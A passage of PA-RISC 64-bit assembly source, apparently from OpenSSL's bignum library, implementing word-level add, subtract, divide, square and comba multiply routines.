DEPDI,Z -1,32,33,high_mask ; Create Mask 0xffffffff80000000L
;
; This loop is unrolled 2 times (64-byte aligned as well)
;
bn_sqr_words_unroll2
FLDD 0(a_ptr),t_float_0 ; a[0]
FLDD 8(a_ptr),t_float_1 ; a[1]
XMPYU fht_0,flt_0,fm ; m[0]
XMPYU fht_1,flt_1,fm_1 ; m[1]
FSTD fm,-24(%sp) ; store m[0]
FSTD fm_1,-56(%sp) ; store m[1]
XMPYU flt_0,flt_0,lt_temp ; lt[0]
XMPYU flt_1,flt_1,lt_temp_1 ; lt[1]
FSTD lt_temp,-16(%sp) ; store lt[0]
FSTD lt_temp_1,-48(%sp) ; store lt[1]
XMPYU fht_0,fht_0,ht_temp ; ht[0]
XMPYU fht_1,fht_1,ht_temp_1 ; ht[1]
FSTD ht_temp,-8(%sp) ; store ht[0]
FSTD ht_temp_1,-40(%sp) ; store ht[1]
LDD -24(%sp),m_0
LDD -56(%sp),m_1
AND m_0,high_mask,tmp_0 ; m[0] & Mask
AND m_1,high_mask,tmp_1 ; m[1] & Mask
DEPD,Z m_0,30,31,m_0 ; m[0] << 32+1
DEPD,Z m_1,30,31,m_1 ; m[1] << 32+1
LDD -16(%sp),lt_0
LDD -48(%sp),lt_1
EXTRD,U tmp_0,32,33,tmp_0 ; tmp_0 = m[0]&Mask >> 32-1
EXTRD,U tmp_1,32,33,tmp_1 ; tmp_1 = m[1]&Mask >> 32-1
LDD -8(%sp),ht_0
LDD -40(%sp),ht_1
ADD,L ht_0,tmp_0,ht_0 ; ht[0] += tmp_0
ADD,L ht_1,tmp_1,ht_1 ; ht[1] += tmp_1
ADD lt_0,m_0,lt_0 ; lt = lt+m
ADD,DC ht_0,%r0,ht_0 ; ht[0]++
STD lt_0,0(r_ptr) ; rp[0] = lt[0]
STD ht_0,8(r_ptr) ; rp[1] = ht[1]
ADD lt_1,m_1,lt_1 ; lt = lt+m
ADD,DC ht_1,%r0,ht_1 ; ht[1]++
STD lt_1,16(r_ptr) ; rp[2] = lt[1]
STD ht_1,24(r_ptr) ; rp[3] = ht[1]
LDO -2(num),num ; num = num - 2;
LDO 16(a_ptr),a_ptr ; ap += 2
CMPIB,<= 2,num,bn_sqr_words_unroll2
LDO 32(r_ptr),r_ptr ; rp += 4
CMPIB,=,N 0,num,bn_sqr_words_exit ; are we done?
;
; Top of loop aligned on 64-byte boundary
;
bn_sqr_words_single_top
FLDD 0(a_ptr),t_float_0 ; load up 64-bit value (fr8L) ht(L)/lt(R)
XMPYU fht_0,flt_0,fm ; m
FSTD fm,-24(%sp) ; store m
XMPYU flt_0,flt_0,lt_temp ; lt
FSTD lt_temp,-16(%sp) ; store lt
XMPYU fht_0,fht_0,ht_temp ; ht
FSTD ht_temp,-8(%sp) ; store ht
LDD -24(%sp),m_0 ; load m
AND m_0,high_mask,tmp_0 ; m & Mask
DEPD,Z m_0,30,31,m_0 ; m << 32+1
LDD -16(%sp),lt_0 ; lt
LDD -8(%sp),ht_0 ; ht
EXTRD,U tmp_0,32,33,tmp_0 ; tmp_0 = m&Mask >> 32-1
ADD m_0,lt_0,lt_0 ; lt = lt+m
ADD,L ht_0,tmp_0,ht_0 ; ht += tmp_0
ADD,DC ht_0,%r0,ht_0 ; ht++
STD lt_0,0(r_ptr) ; rp[0] = lt
STD ht_0,8(r_ptr) ; rp[1] = ht
bn_sqr_words_exit
.EXIT
LDD -112(%sp),%r5 ; restore r5
LDD -120(%sp),%r4 ; restore r4
BVE (%rp)
LDD,MB -128(%sp),%r3
.PROCEND ;in=23,24,25,26,29;out=28;
;----------------------------------------------------------------------------
;
;BN_ULONG bn_add_words(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n)
;
; arg0 = rp
; arg1 = ap
; arg2 = bp
; arg3 = n
t .reg %r22
b .reg %r21
l .reg %r20
bn_add_words
.proc
.entry
.callinfo
.EXPORT bn_add_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.align 64
CMPIB,>= 0,n,bn_add_words_exit
COPY %r0,%ret1 ; return 0 by default
;
; If 2 or more numbers do the loop
;
CMPIB,= 1,n,bn_add_words_single_top
NOP
;
; This loop is unrolled 2 times (64-byte aligned as well)
;
bn_add_words_unroll2
LDD 0(a_ptr),t
LDD 0(b_ptr),b
ADD t,%ret1,t ; t = t+c;
ADD,DC %r0,%r0,%ret1 ; set c to carry
ADD t,b,l ; l = t + b[0]
ADD,DC %ret1,%r0,%ret1 ; c+= carry
STD l,0(r_ptr)
LDD 8(a_ptr),t
LDD 8(b_ptr),b
ADD t,%ret1,t ; t = t+c;
ADD,DC %r0,%r0,%ret1 ; set c to carry
ADD t,b,l ; l = t + b[0]
ADD,DC %ret1,%r0,%ret1 ; c+= carry
STD l,8(r_ptr)
LDO -2(n),n
LDO 16(a_ptr),a_ptr
LDO 16(b_ptr),b_ptr
CMPIB,<= 2,n,bn_add_words_unroll2
LDO 16(r_ptr),r_ptr
CMPIB,=,N 0,n,bn_add_words_exit ; are we done?
bn_add_words_single_top
LDD 0(a_ptr),t
LDD 0(b_ptr),b
ADD t,%ret1,t ; t = t+c;
ADD,DC %r0,%r0,%ret1 ; set c to carry (could use CMPCLR??)
ADD t,b,l ; l = t + b[0]
ADD,DC %ret1,%r0,%ret1 ; c+= carry
STD l,0(r_ptr)
bn_add_words_exit
.EXIT
BVE (%rp)
EXTRD,U %ret1,31,32,%ret0 ; for 32-bit, return in ret0/ret1
.PROCEND ;in=23,24,25,26,29;out=28;
;----------------------------------------------------------------------------
;
;BN_ULONG bn_sub_words(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n)
;
; arg0 = rp
; arg1 = ap
; arg2 = bp
; arg3 = n
t1 .reg %r22
t2 .reg %r21
sub_tmp1 .reg %r20
sub_tmp2 .reg %r19
bn_sub_words
.proc
.callinfo
.EXPORT bn_sub_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.entry
.align 64
CMPIB,>= 0,n,bn_sub_words_exit
COPY %r0,%ret1 ; return 0 by default
;
; If 2 or more numbers do the loop
;
CMPIB,= 1,n,bn_sub_words_single_top
NOP
;
; This loop is unrolled 2 times (64-byte aligned as well)
;
bn_sub_words_unroll2
LDD 0(a_ptr),t1
LDD 0(b_ptr),t2
SUB t1,t2,sub_tmp1 ; t3 = t1-t2;
SUB sub_tmp1,%ret1,sub_tmp1 ; t3 = t3- c;
CMPCLR,*>> t1,t2,sub_tmp2 ; clear if t1 > t2
LDO 1(%r0),sub_tmp2
CMPCLR,*= t1,t2,%r0
COPY sub_tmp2,%ret1
STD sub_tmp1,0(r_ptr)
LDD 8(a_ptr),t1
LDD 8(b_ptr),t2
SUB t1,t2,sub_tmp1 ; t3 = t1-t2;
SUB sub_tmp1,%ret1,sub_tmp1 ; t3 = t3- c;
CMPCLR,*>> t1,t2,sub_tmp2 ; clear if t1 > t2
LDO 1(%r0),sub_tmp2
CMPCLR,*= t1,t2,%r0
COPY sub_tmp2,%ret1
STD sub_tmp1,8(r_ptr)
LDO -2(n),n
LDO 16(a_ptr),a_ptr
LDO 16(b_ptr),b_ptr
CMPIB,<= 2,n,bn_sub_words_unroll2
LDO 16(r_ptr),r_ptr
CMPIB,=,N 0,n,bn_sub_words_exit ; are we done?
bn_sub_words_single_top
LDD 0(a_ptr),t1
LDD 0(b_ptr),t2
SUB t1,t2,sub_tmp1 ; t3 = t1-t2;
SUB sub_tmp1,%ret1,sub_tmp1 ; t3 = t3- c;
CMPCLR,*>> t1,t2,sub_tmp2 ; clear if t1 > t2
LDO 1(%r0),sub_tmp2
CMPCLR,*= t1,t2,%r0
COPY sub_tmp2,%ret1
STD sub_tmp1,0(r_ptr)
bn_sub_words_exit
.EXIT
BVE (%rp)
EXTRD,U %ret1,31,32,%ret0 ; for 32-bit, return in ret0/ret1
.PROCEND ;in=23,24,25,26,29;out=28;
;------------------------------------------------------------------------------
;
; unsigned long bn_div_words(unsigned long h, unsigned long l, unsigned long d)
;
; arg0 = h
; arg1 = l
; arg2 = d
;
; This is mainly just output from the HP C compiler.
;
;------------------------------------------------------------------------------
bn_div_words
.PROC
.EXPORT bn_div_words,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR,ARGW2=GR,ARGW3=GR,RTNVAL=GR,LONG_RETURN
.IMPORT BN_num_bits_word,CODE
;--- not PIC .IMPORT __iob,DATA
;--- not PIC .IMPORT fprintf,CODE
.IMPORT abort,CODE
.IMPORT $$div2U,MILLICODE
.CALLINFO CALLER,FRAME=144,ENTRY_GR=%r9,SAVE_RP,ARGS_SAVED,ORDERING_AWARE
.ENTRY
STW %r2,-20(%r30) ;offset 0x8ec
STW,MA %r3,192(%r30) ;offset 0x8f0
STW %r4,-188(%r30) ;offset 0x8f4
DEPD %r5,31,32,%r6 ;offset 0x8f8
STD %r6,-184(%r30) ;offset 0x8fc
DEPD %r7,31,32,%r8 ;offset 0x900
STD %r8,-176(%r30) ;offset 0x904
STW %r9,-168(%r30) ;offset 0x908
LDD -248(%r30),%r3 ;offset 0x90c
COPY %r26,%r4 ;offset 0x910
COPY %r24,%r5 ;offset 0x914
DEPD %r25,31,32,%r4 ;offset 0x918
CMPB,*<> %r3,%r0,$0006000C ;offset 0x91c
DEPD %r23,31,32,%r5 ;offset 0x920
MOVIB,TR -1,%r29,$00060002 ;offset 0x924
EXTRD,U %r29,31,32,%r28 ;offset 0x928
$0006002A
LDO -1(%r29),%r29 ;offset 0x92c
SUB %r23,%r7,%r23 ;offset 0x930
$00060024
SUB %r4,%r31,%r25 ;offset 0x934
AND %r25,%r19,%r26 ;offset 0x938
CMPB,*<>,N %r0,%r26,$00060046 ;offset 0x93c
DEPD,Z %r25,31,32,%r20 ;offset 0x940
OR %r20,%r24,%r21 ;offset 0x944
CMPB,*<<,N %r21,%r23,$0006002A ;offset 0x948
SUB %r31,%r2,%r31 ;offset 0x94c
$00060046
$0006002E
DEPD,Z %r23,31,32,%r25 ;offset 0x950
EXTRD,U %r23,31,32,%r26 ;offset 0x954
AND %r25,%r19,%r24 ;offset 0x958
ADD,L %r31,%r26,%r31 ;offset 0x95c
CMPCLR,*>>= %r5,%r24,%r0 ;offset 0x960
LDO 1(%r31),%r31 ;offset 0x964
$00060032
CMPB,*<<=,N %r31,%r4,$00060036 ;offset 0x968
LDO -1(%r29),%r29 ;offset 0x96c
ADD,L %r4,%r3,%r4 ;offset 0x970
$00060036
ADDIB,=,N -1,%r8,$D0 ;offset 0x974
SUB %r5,%r24,%r28 ;offset 0x978
$0006003A
SUB %r4,%r31,%r24 ;offset 0x97c
SHRPD %r24,%r28,32,%r4 ;offset 0x980
DEPD,Z %r29,31,32,%r9 ;offset 0x984
DEPD,Z %r28,31,32,%r5 ;offset 0x988
$0006001C
EXTRD,U %r4,31,32,%r31 ;offset 0x98c
CMPB,*<>,N %r31,%r2,$00060020 ;offset 0x990
MOVB,TR %r6,%r29,$D1 ;offset 0x994
STD %r29,-152(%r30) ;offset 0x998
$0006000C
EXTRD,U %r3,31,32,%r25 ;offset 0x99c
COPY %r3,%r26 ;offset 0x9a0
EXTRD,U %r3,31,32,%r9 ;offset 0x9a4
EXTRD,U %r4,31,32,%r8 ;offset 0x9a8
.CALL ARGW0=GR,ARGW1=GR,RTNVAL=GR ;in=25,26;out=28;
B,L BN_num_bits_word,%r2 ;offset 0x9ac
EXTRD,U %r5,31,32,%r7 ;offset 0x9b0
LDI 64,%r20 ;offset 0x9b4
DEPD %r7,31,32,%r5 ;offset 0x9b8
DEPD %r8,31,32,%r4 ;offset 0x9bc
DEPD %r9,31,32,%r3 ;offset 0x9c0
CMPB,= %r28,%r20,$00060012 ;offset 0x9c4
COPY %r28,%r24 ;offset 0x9c8
MTSARCM %r24 ;offset 0x9cc
DEPDI,Z -1,%sar,1,%r19 ;offset 0x9d0
CMPB,*>>,N %r4,%r19,$D2 ;offset 0x9d4
$00060012
SUBI 64,%r24,%r31 ;offset 0x9d8
CMPCLR,*<< %r4,%r3,%r0 ;offset 0x9dc
SUB %r4,%r3,%r4 ;offset 0x9e0
$00060016
CMPB,= %r31,%r0,$0006001A ;offset 0x9e4
COPY %r0,%r9 ;offset 0x9e8
MTSARCM %r31 ;offset 0x9ec
DEPD,Z %r3,%sar,64,%r3 ;offset 0x9f0
SUBI 64,%r31,%r26 ;offset 0x9f4
MTSAR %r26 ;offset 0x9f8
SHRPD %r4,%r5,%sar,%r4 ;offset 0x9fc
MTSARCM %r31 ;offset 0xa00
DEPD,Z %r5,%sar,64,%r5 ;offset 0xa04
$0006001A
DEPDI,Z -1,31,32,%r19 ;offset 0xa08
AND %r3,%r19,%r29 ;offset 0xa0c
EXTRD,U %r29,31,32,%r2 ;offset 0xa10
DEPDI,Z -1,63,32,%r6 ;offset 0xa14
MOVIB,TR 2,%r8,$0006001C ;offset 0xa18
EXTRD,U %r3,63,32,%r7 ;offset 0xa1c
$D2
;--- not PIC ADDIL LR'__iob-$global$,%r27,%r1 ;offset 0xa20
;--- not PIC LDIL LR'C$7,%r21 ;offset 0xa24
;--- not PIC LDO RR'__iob-$global$+32(%r1),%r26 ;offset 0xa28
;--- not PIC .CALL ARGW0=GR,ARGW1=GR,ARGW2=GR,RTNVAL=GR ;in=24,25,26;out=28;
;--- not PIC B,L fprintf,%r2 ;offset 0xa2c
;--- not PIC LDO RR'C$7(%r21),%r25 ;offset 0xa30
.CALL ;
B,L abort,%r2 ;offset 0xa34
NOP ;offset 0xa38
B $D3 ;offset 0xa3c
LDW -212(%r30),%r2 ;offset 0xa40
$00060020
COPY %r4,%r26 ;offset 0xa44
EXTRD,U %r4,31,32,%r25 ;offset 0xa48
COPY %r2,%r24 ;offset 0xa4c
.CALL ;in=23,24,25,26;out=20,21,22,28,29; (MILLICALL)
B,L $$div2U,%r31 ;offset 0xa50
EXTRD,U %r2,31,32,%r23 ;offset 0xa54
DEPD %r28,31,32,%r29 ;offset 0xa58
$00060022
STD %r29,-152(%r30) ;offset 0xa5c
$D1
AND %r5,%r19,%r24 ;offset 0xa60
EXTRD,U %r24,31,32,%r24 ;offset 0xa64
STW %r2,-160(%r30) ;offset 0xa68
STW %r7,-128(%r30) ;offset 0xa6c
FLDD -152(%r30),%fr4 ;offset 0xa70
FLDD -152(%r30),%fr7 ;offset 0xa74
FLDW -160(%r30),%fr8L ;offset 0xa78
FLDW -128(%r30),%fr5L ;offset 0xa7c
XMPYU %fr8L,%fr7L,%fr10 ;offset 0xa80
FSTD %fr10,-136(%r30) ;offset 0xa84
XMPYU %fr8L,%fr7R,%fr22 ;offset 0xa88
FSTD %fr22,-144(%r30) ;offset 0xa8c
XMPYU %fr5L,%fr4L,%fr11 ;offset 0xa90
XMPYU %fr5L,%fr4R,%fr23 ;offset 0xa94
FSTD %fr11,-112(%r30) ;offset 0xa98
FSTD %fr23,-120(%r30) ;offset 0xa9c
LDD -136(%r30),%r28 ;offset 0xaa0
DEPD,Z %r28,31,32,%r31 ;offset 0xaa4
LDD -144(%r30),%r20 ;offset 0xaa8
ADD,L %r20,%r31,%r31 ;offset 0xaac
LDD -112(%r30),%r22 ;offset 0xab0
DEPD,Z %r22,31,32,%r22 ;offset 0xab4
LDD -120(%r30),%r21 ;offset 0xab8
B $00060024 ;offset 0xabc
ADD,L %r21,%r22,%r23 ;offset 0xac0
$D0
OR %r9,%r29,%r29 ;offset 0xac4
$00060040
EXTRD,U %r29,31,32,%r28 ;offset 0xac8
$00060002
$L2
LDW -212(%r30),%r2 ;offset 0xacc
$D3
LDW -168(%r30),%r9 ;offset 0xad0
LDD -176(%r30),%r8 ;offset 0xad4
EXTRD,U %r8,31,32,%r7 ;offset 0xad8
LDD -184(%r30),%r6 ;offset 0xadc
EXTRD,U %r6,31,32,%r5 ;offset 0xae0
LDW -188(%r30),%r4 ;offset 0xae4
BVE (%r2) ;offset 0xae8
.EXIT
LDW,MB -192(%r30),%r3 ;offset 0xaec
.PROCEND ;in=23,25;out=28,29;fpin=105,107;
;----------------------------------------------------------------------------
;
; Registers to hold 64-bit values to manipulate. The "L" part
; of the register corresponds to the upper 32-bits, while the "R"
; part corresponds to the lower 32-bits
;
; Note, that when using b6 and b7, the code must save these before
; using them because they are callee save registers
;
;
; Floating point registers to use to save values that
; are manipulated. These don't collide with ftemp1-6 and
; are all caller save registers
;
a0 .reg %fr22
a0L .reg %fr22L
a0R .reg %fr22R
a1 .reg %fr23
a1L .reg %fr23L
a1R .reg %fr23R
a2 .reg %fr24
a2L .reg %fr24L
a2R .reg %fr24R
a3 .reg %fr25
a3L .reg %fr25L
a3R .reg %fr25R
a4 .reg %fr26
a4L .reg %fr26L
a4R .reg %fr26R
a5 .reg %fr27
a5L .reg %fr27L
a5R .reg %fr27R
a6 .reg %fr28
a6L .reg %fr28L
a6R .reg %fr28R
a7 .reg %fr29
a7L .reg %fr29L
a7R .reg %fr29R
b0 .reg %fr30
b0L .reg %fr30L
b0R .reg %fr30R
b1 .reg %fr31
b1L .reg %fr31L
b1R .reg %fr31R
;
; Temporary floating point variables, these are all caller save
; registers
;
ftemp1 .reg %fr4
ftemp2 .reg %fr5
ftemp3 .reg %fr6
ftemp4 .reg %fr7
;
; The B set of registers when used.
;
b2 .reg %fr8
b2L .reg %fr8L
b2R .reg %fr8R
b3 .reg %fr9
b3L .reg %fr9L
b3R .reg %fr9R
b4 .reg %fr10
b4L .reg %fr10L
b4R .reg %fr10R
b5 .reg %fr11
b5L .reg %fr11L
b5R .reg %fr11R
b6 .reg %fr12
b6L .reg %fr12L
b6R .reg %fr12R
b7 .reg %fr13
b7L .reg %fr13L
b7R .reg %fr13R
c1 .reg %r21 ; only reg
temp1 .reg %r20 ; only reg
temp2 .reg %r19 ; only reg
temp3 .reg %r31 ; only reg
m1 .reg %r28
c2 .reg %r23
high_one .reg %r1
ht .reg %r6
lt .reg %r5
m .reg %r4
c3 .reg %r3
SQR_ADD_C .macro A0L,A0R,C1,C2,C3
XMPYU A0L,A0R,ftemp1 ; m
FSTD ftemp1,-24(%sp) ; store m
XMPYU A0R,A0R,ftemp2 ; lt
FSTD ftemp2,-16(%sp) ; store lt
XMPYU A0L,A0L,ftemp3 ; ht
FSTD ftemp3,-8(%sp) ; store ht
LDD -24(%sp),m ; load m
AND m,high_mask,temp2 ; m & Mask
DEPD,Z m,30,31,temp3 ; m << 32+1
LDD -16(%sp),lt ; lt
LDD -8(%sp),ht ; ht
EXTRD,U temp2,32,33,temp1 ; temp1 = m&Mask >> 32-1
ADD temp3,lt,lt ; lt = lt+m
ADD,L ht,temp1,ht ; ht += temp1
ADD,DC ht,%r0,ht ; ht++
ADD C1,lt,C1 ; c1=c1+lt
ADD,DC ht,%r0,ht ; ht++
ADD C2,ht,C2 ; c2=c2+ht
ADD,DC C3,%r0,C3 ; c3++
.endm
SQR_ADD_C2 .macro A0L,A0R,A1L,A1R,C1,C2,C3
XMPYU A0L,A1R,ftemp1 ; m1 = bl*ht
FSTD ftemp1,-16(%sp) ;
XMPYU A0R,A1L,ftemp2 ; m = bh*lt
FSTD ftemp2,-8(%sp) ;
XMPYU A0R,A1R,ftemp3 ; lt = bl*lt
FSTD ftemp3,-32(%sp)
XMPYU A0L,A1L,ftemp4 ; ht = bh*ht
FSTD ftemp4,-24(%sp) ;
LDD -8(%sp),m ; r21 = m
LDD -16(%sp),m1 ; r19 = m1
ADD,L m,m1,m ; m+m1
DEPD,Z m,31,32,temp3 ; (m+m1<<32)
LDD -24(%sp),ht ; r24 = ht
CMPCLR,*>>= m,m1,%r0 ; if (m < m1)
ADD,L ht,high_one,ht ; ht+=high_one
EXTRD,U m,31,32,temp1 ; m >> 32
LDD -32(%sp),lt ; lt
ADD,L ht,temp1,ht ; ht+= m>>32
ADD lt,temp3,lt ; lt = lt+m1
ADD,DC ht,%r0,ht ; ht++
ADD ht,ht,ht ; ht=ht+ht;
ADD,DC C3,%r0,C3 ; add in carry (c3++)
ADD lt,lt,lt ; lt=lt+lt;
ADD,DC ht,%r0,ht ; add in carry (ht++)
ADD C1,lt,C1 ; c1=c1+lt
ADD,DC,*NUV ht,%r0,ht ; add in carry (ht++)
LDO 1(C3),C3 ; bump c3 if overflow,nullify otherwise
ADD C2,ht,C2 ; c2 = c2 + ht
ADD,DC C3,%r0,C3 ; add in carry (c3++)
.endm
;
;void bn_sqr_comba8(BN_ULONG *r, BN_ULONG *a)
; arg0 = r_ptr
; arg1 = a_ptr
;
bn_sqr_comba8
.PROC
.CALLINFO FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
.EXPORT bn_sqr_comba8,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.ENTRY
.align 64
STD %r3,0(%sp) ; save r3
STD %r4,8(%sp) ; save r4
STD %r5,16(%sp) ; save r5
STD %r6,24(%sp) ; save r6
;
; Zero out carries
;
COPY %r0,c1
COPY %r0,c2
COPY %r0,c3
LDO 128(%sp),%sp ; bump stack
DEPDI,Z -1,32,33,high_mask ; Create Mask 0xffffffff80000000L
DEPDI,Z 1,31,1,high_one ; Create Value 1 << 32
;
; Load up all of the values we are going to use
;
FLDD 0(a_ptr),a0
FLDD 8(a_ptr),a1
FLDD 16(a_ptr),a2
FLDD 24(a_ptr),a3
FLDD 32(a_ptr),a4
FLDD 40(a_ptr),a5
FLDD 48(a_ptr),a6
FLDD 56(a_ptr),a7
SQR_ADD_C a0L,a0R,c1,c2,c3
STD c1,0(r_ptr) ; r[0] = c1;
COPY %r0,c1
SQR_ADD_C2 a1L,a1R,a0L,a0R,c2,c3,c1
STD c2,8(r_ptr) ; r[1] = c2;
COPY %r0,c2
SQR_ADD_C a1L,a1R,c3,c1,c2
SQR_ADD_C2 a2L,a2R,a0L,a0R,c3,c1,c2
STD c3,16(r_ptr) ; r[2] = c3;
COPY %r0,c3
SQR_ADD_C2 a3L,a3R,a0L,a0R,c1,c2,c3
SQR_ADD_C2 a2L,a2R,a1L,a1R,c1,c2,c3
STD c1,24(r_ptr) ; r[3] = c1;
COPY %r0,c1
SQR_ADD_C a2L,a2R,c2,c3,c1
SQR_ADD_C2 a3L,a3R,a1L,a1R,c2,c3,c1
SQR_ADD_C2 a4L,a4R,a0L,a0R,c2,c3,c1
STD c2,32(r_ptr) ; r[4] = c2;
COPY %r0,c2
SQR_ADD_C2 a5L,a5R,a0L,a0R,c3,c1,c2
SQR_ADD_C2 a4L,a4R,a1L,a1R,c3,c1,c2
SQR_ADD_C2 a3L,a3R,a2L,a2R,c3,c1,c2
STD c3,40(r_ptr) ; r[5] = c3;
COPY %r0,c3
SQR_ADD_C a3L,a3R,c1,c2,c3
SQR_ADD_C2 a4L,a4R,a2L,a2R,c1,c2,c3
SQR_ADD_C2 a5L,a5R,a1L,a1R,c1,c2,c3
SQR_ADD_C2 a6L,a6R,a0L,a0R,c1,c2,c3
STD c1,48(r_ptr) ; r[6] = c1;
COPY %r0,c1
SQR_ADD_C2 a7L,a7R,a0L,a0R,c2,c3,c1
SQR_ADD_C2 a6L,a6R,a1L,a1R,c2,c3,c1
SQR_ADD_C2 a5L,a5R,a2L,a2R,c2,c3,c1
SQR_ADD_C2 a4L,a4R,a3L,a3R,c2,c3,c1
STD c2,56(r_ptr) ; r[7] = c2;
COPY %r0,c2
SQR_ADD_C a4L,a4R,c3,c1,c2
SQR_ADD_C2 a5L,a5R,a3L,a3R,c3,c1,c2
SQR_ADD_C2 a6L,a6R,a2L,a2R,c3,c1,c2
SQR_ADD_C2 a7L,a7R,a1L,a1R,c3,c1,c2
STD c3,64(r_ptr) ; r[8] = c3;
COPY %r0,c3
SQR_ADD_C2 a7L,a7R,a2L,a2R,c1,c2,c3
SQR_ADD_C2 a6L,a6R,a3L,a3R,c1,c2,c3
SQR_ADD_C2 a5L,a5R,a4L,a4R,c1,c2,c3
STD c1,72(r_ptr) ; r[9] = c1;
COPY %r0,c1
SQR_ADD_C a5L,a5R,c2,c3,c1
SQR_ADD_C2 a6L,a6R,a4L,a4R,c2,c3,c1
SQR_ADD_C2 a7L,a7R,a3L,a3R,c2,c3,c1
STD c2,80(r_ptr) ; r[10] = c2;
COPY %r0,c2
SQR_ADD_C2 a7L,a7R,a4L,a4R,c3,c1,c2
SQR_ADD_C2 a6L,a6R,a5L,a5R,c3,c1,c2
STD c3,88(r_ptr) ; r[11] = c3;
COPY %r0,c3
SQR_ADD_C a6L,a6R,c1,c2,c3
SQR_ADD_C2 a7L,a7R,a5L,a5R,c1,c2,c3
STD c1,96(r_ptr) ; r[12] = c1;
COPY %r0,c1
SQR_ADD_C2 a7L,a7R,a6L,a6R,c2,c3,c1
STD c2,104(r_ptr) ; r[13] = c2;
COPY %r0,c2
SQR_ADD_C a7L,a7R,c3,c1,c2
STD c3, 112(r_ptr) ; r[14] = c3
STD c1, 120(r_ptr) ; r[15] = c1
.EXIT
LDD -104(%sp),%r6 ; restore r6
LDD -112(%sp),%r5 ; restore r5
LDD -120(%sp),%r4 ; restore r4
BVE (%rp)
LDD,MB -128(%sp),%r3
.PROCEND
;-----------------------------------------------------------------------------
;
;void bn_sqr_comba4(BN_ULONG *r, BN_ULONG *a)
; arg0 = r_ptr
; arg1 = a_ptr
;
bn_sqr_comba4
.proc
.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
.EXPORT bn_sqr_comba4,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.entry
.align 64
STD %r3,0(%sp) ; save r3
STD %r4,8(%sp) ; save r4
STD %r5,16(%sp) ; save r5
STD %r6,24(%sp) ; save r6
;
; Zero out carries
;
COPY %r0,c1
COPY %r0,c2
COPY %r0,c3
LDO 128(%sp),%sp ; bump stack
DEPDI,Z -1,32,33,high_mask ; Create Mask 0xffffffff80000000L
DEPDI,Z 1,31,1,high_one ; Create Value 1 << 32
;
; Load up all of the values we are going to use
;
FLDD 0(a_ptr),a0
FLDD 8(a_ptr),a1
FLDD 16(a_ptr),a2
FLDD 24(a_ptr),a3
FLDD 32(a_ptr),a4
FLDD 40(a_ptr),a5
FLDD 48(a_ptr),a6
FLDD 56(a_ptr),a7
SQR_ADD_C a0L,a0R,c1,c2,c3
STD c1,0(r_ptr) ; r[0] = c1;
COPY %r0,c1
SQR_ADD_C2 a1L,a1R,a0L,a0R,c2,c3,c1
STD c2,8(r_ptr) ; r[1] = c2;
COPY %r0,c2
SQR_ADD_C a1L,a1R,c3,c1,c2
SQR_ADD_C2 a2L,a2R,a0L,a0R,c3,c1,c2
STD c3,16(r_ptr) ; r[2] = c3;
COPY %r0,c3
SQR_ADD_C2 a3L,a3R,a0L,a0R,c1,c2,c3
SQR_ADD_C2 a2L,a2R,a1L,a1R,c1,c2,c3
STD c1,24(r_ptr) ; r[3] = c1;
COPY %r0,c1
SQR_ADD_C a2L,a2R,c2,c3,c1
SQR_ADD_C2 a3L,a3R,a1L,a1R,c2,c3,c1
STD c2,32(r_ptr) ; r[4] = c2;
COPY %r0,c2
SQR_ADD_C2 a3L,a3R,a2L,a2R,c3,c1,c2
STD c3,40(r_ptr) ; r[5] = c3;
COPY %r0,c3
SQR_ADD_C a3L,a3R,c1,c2,c3
STD c1,48(r_ptr) ; r[6] = c1;
STD c2,56(r_ptr) ; r[7] = c2;
.EXIT
LDD -104(%sp),%r6 ; restore r6
LDD -112(%sp),%r5 ; restore r5
LDD -120(%sp),%r4 ; restore r4
BVE (%rp)
LDD,MB -128(%sp),%r3
.PROCEND
;---------------------------------------------------------------------------
MUL_ADD_C .macro A0L,A0R,B0L,B0R,C1,C2,C3
XMPYU A0L,B0R,ftemp1 ; m1 = bl*ht
FSTD ftemp1,-16(%sp) ;
XMPYU A0R,B0L,ftemp2 ; m = bh*lt
FSTD ftemp2,-8(%sp) ;
XMPYU A0R,B0R,ftemp3 ; lt = bl*lt
FSTD ftemp3,-32(%sp)
XMPYU A0L,B0L,ftemp4 ; ht = bh*ht
FSTD ftemp4,-24(%sp) ;
LDD -8(%sp),m ; r21 = m
LDD -16(%sp),m1 ; r19 = m1
ADD,L m,m1,m ; m+m1
DEPD,Z m,31,32,temp3 ; (m+m1<<32)
LDD -24(%sp),ht ; r24 = ht
CMPCLR,*>>= m,m1,%r0 ; if (m < m1)
ADD,L ht,high_one,ht ; ht+=high_one
EXTRD,U m,31,32,temp1 ; m >> 32
LDD -32(%sp),lt ; lt
ADD,L ht,temp1,ht ; ht+= m>>32
ADD lt,temp3,lt ; lt = lt+m1
ADD,DC ht,%r0,ht ; ht++
ADD C1,lt,C1 ; c1=c1+lt
ADD,DC ht,%r0,ht ; bump c3 if overflow,nullify otherwise
ADD C2,ht,C2 ; c2 = c2 + ht
ADD,DC C3,%r0,C3 ; add in carry (c3++)
.endm
;
;void bn_mul_comba8(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
; arg0 = r_ptr
; arg1 = a_ptr
; arg2 = b_ptr
;
bn_mul_comba8
.proc
.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
.EXPORT bn_mul_comba8,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.entry
.align 64
STD %r3,0(%sp) ; save r3
STD %r4,8(%sp) ; save r4
STD %r5,16(%sp) ; save r5
STD %r6,24(%sp) ; save r6
FSTD %fr12,32(%sp) ; save r6
FSTD %fr13,40(%sp) ; save r7
;
; Zero out carries
;
COPY %r0,c1
COPY %r0,c2
COPY %r0,c3
LDO 128(%sp),%sp ; bump stack
DEPDI,Z 1,31,1,high_one ; Create Value 1 << 32
;
; Load up all of the values we are going to use
;
FLDD 0(a_ptr),a0
FLDD 8(a_ptr),a1
FLDD 16(a_ptr),a2
FLDD 24(a_ptr),a3
FLDD 32(a_ptr),a4
